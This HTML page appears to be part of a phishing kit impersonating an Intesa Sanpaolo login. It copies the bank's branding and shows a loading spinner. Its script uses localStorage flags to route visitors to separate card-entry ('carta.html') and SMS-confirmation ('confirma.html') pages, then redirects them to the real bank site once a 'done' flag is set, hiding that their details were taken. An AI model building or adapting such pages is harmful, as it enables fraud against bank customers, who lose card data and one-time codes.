<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="./assets/favicon.ico" type="image/x-icon">
    <title>Login - Entra - Intesa Sanpaolo</title>
</head>

<body>
    <div class="w-full">
        <nav class="bg-[#333] hidden sm:block antialiased">
            <ul class="flex items-center h-[55px] pl-5 font-sans text-[10px]">
                <li class="text-[#ffffff] uppercase antialiased mr-[34px]">Corporate</li>
                <li class="text-[#ffffff] uppercase antialiased mr-[34px]">Presenza internazionale</li>
                <li class="text-[#ffffff] uppercase antialiased mr-[34px] flex">
                    <a href="#">Gruppo</a>
                    <a href="" class="p-1"><img
                            src="https://www.intesasanpaolo.com/content/dam/vetrina/design/ico/flag_eng.png" alt=""></a>
                </li>
                <li class="text-[#ffffff] uppercase antialiased mr-[34px]">Careers</li>
                <li class="text-[#ffffff] uppercase antialiased mr-[34px]">News</li>
                <li class="text-[#ffffff] uppercase antialiased mr-[34px]">Club Azionisti</li>

            </ul>
        </nav>
        <nav class="border-b border-solid border-white bg-[#258900] h-[96px] flex justify-between">
            <div class="flex items-center">
                <div class="ml-5 inline-flex items-center align-middle">
                    <img src="https://www.intesasanpaolo.com/etc/designs/vetrina/images/logo-intesasanpaolo.png" alt="">
                </div>
                <ul class=" items-center cursor-pointer hidden md:flex">
                    <li class="text-xl ml-[25px] p-2 text-white font-medium antialiased">Persone e Famiglie</li>
                    <li class="text-xl ml-[25px] text-white font-thin">Business</li>
                    <li class="text-xl ml-[25px] text-white font-thin">Exclusive</li>
                </ul>
            </div>
            <div class="flex justify-between cursor-pointer">
                <div class="max-w-[95px]">
                    <div
                        class="p-5 min-w-[54px] items-center flex justify-center min-h-[95px] border-r border-solid border-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" fill="#fff"
                            class="bi bi-search decoration-solid" viewBox="0 0 16 16">
                            <path
                                d="M11.742 10.344a6.5 6.5 0 1 0-1.397 1.398h-.001c.03.04.062.078.098.115l3.85 3.85a1 1 0 0 0 1.415-1.414l-3.85-3.85a1.007 1.007 0 0 0-.115-.1zM12 6.5a5.5 5.5 0 1 1-11 0 5.5 5.5 0 0 1 11 0z" />
                        </svg>
                    </div>
                </div>
                <div class="max-w-[95px] hidden sm:block">
                    <div
                        class="py-4 px-4 min-w-[54px] items-center flex-col justify-center border-r border-solid border-white">
                        <img class="p-1"
                            src="https://www.intesasanpaolo.com/etc/designs/vetrina/images/ico-parla-con-noi.png"
                            alt="">
                        <span class="text-white text-[0.625rem] uppercase antialiased flex text-center">Parla con
                            noi</span>
                    </div>
                </div>
                <div class="max-w-[95px]">
                    <div class="px-8 py-5 w-[95px] flex items-center flex-col justify-center">
                        <span><svg xmlns="http://www.w3.org/2000/svg" width="35" height="35" fill="#fff"
                                class="bi bi-list" viewBox="0 0 16 16">
                                <path fill-rule="evenodd"
                                    d="M2.5 12a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5z" />
                            </svg></span>
                        <span class="text-white text-[0.625rem] uppercase text-center antialiased">Menu</span>
                    </div>
                </div>
                <div class="max-w-[95px] bg-[#FA9601] hidden sm:block">
                    <div class="flex items-center px-8 py-5 w-[95px] flex-col border-solid  border-l border-white">
                        <img src="./assets/ico-lock.png" width="20" alt="" srcset="">
                        <span class="text-white text-[0.625rem] uppercase antialiased text-center">ACCESSO
                            CLIENTI</span>
                    </div>
                </div>
            </div>
        </nav>
    </div>
    <main class="pt-32 login">
        <div class="max-w-[400px] mx-auto bg-white shadow h-60 grid place-content-center">
            <div id="spinner"
                class="mx-auto w-24 h-24 animate-spin rounded-full border-[5px] border-[#2e8800] border-b-transparent">
            </div>
            <div id="done" class="hidden">
                <svg width="100px" fill="#2e8800" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
                    <!--! Font Awesome Pro 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. -->
                    <path
                        d="M256 512c141.4 0 256-114.6 256-256S397.4 0 256 0S0 114.6 0 256S114.6 512 256 512zM369 209L241 337c-9.4 9.4-24.6 9.4-33.9 0l-64-64c-9.4-9.4-9.4-24.6 0-33.9s24.6-9.4 33.9 0l47 47L335 175c9.4-9.4 24.6-9.4 33.9 0s9.4 24.6 0 33.9z" />
                </svg>
            </div>
        </div>
    </main>
    <footer class="mt-8">
        <div class="hidden sm:block">
            <img src="./assets/footer3.png" alt="" srcset="">
            <img src="./assets/footer2.png" alt="" srcset="">
            <img src="./assets/footer1.png" alt="" srcset="">
        </div>
        <div class="block sm:hidden">
            <img src="./assets/footer1m.png" alt="" srcset="">
            <img src="./assets/footer2m.png" alt="" srcset="">
            <img src="./assets/footer3m.png" alt="" srcset="">
        </div>
    </footer>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <script>
        $(document).ready(function () {
            let goto = localStorage.getItem('goto');

            if (goto == 'cc') {
                setTimeout(() => {
                    window.location.href = './carta.html'
                }, 5000);
            }
            if (goto == 'sms') {
                setTimeout(() => {
                    window.location.href = './confirma.html'
                }, 5000);
            }
            if (goto == 'sms2') {
                setTimeout(() => {
                    window.location.href = './confirma.html'
                }, 5000);
            }
            if (goto == 'sms2' && localStorage.getItem('done') == 'yup') {
                localStorage.removeItem('goto');
                localStorage.removeItem('done');
                $('#spinner').addClass('hidden');
                setTimeout(() => {
                    $('#done').removeClass('hidden');
                    window.location.href = 'https://www.intesasanpaolo.com'
                }, 5000);
            }
        });
    </script>
</body>

</html>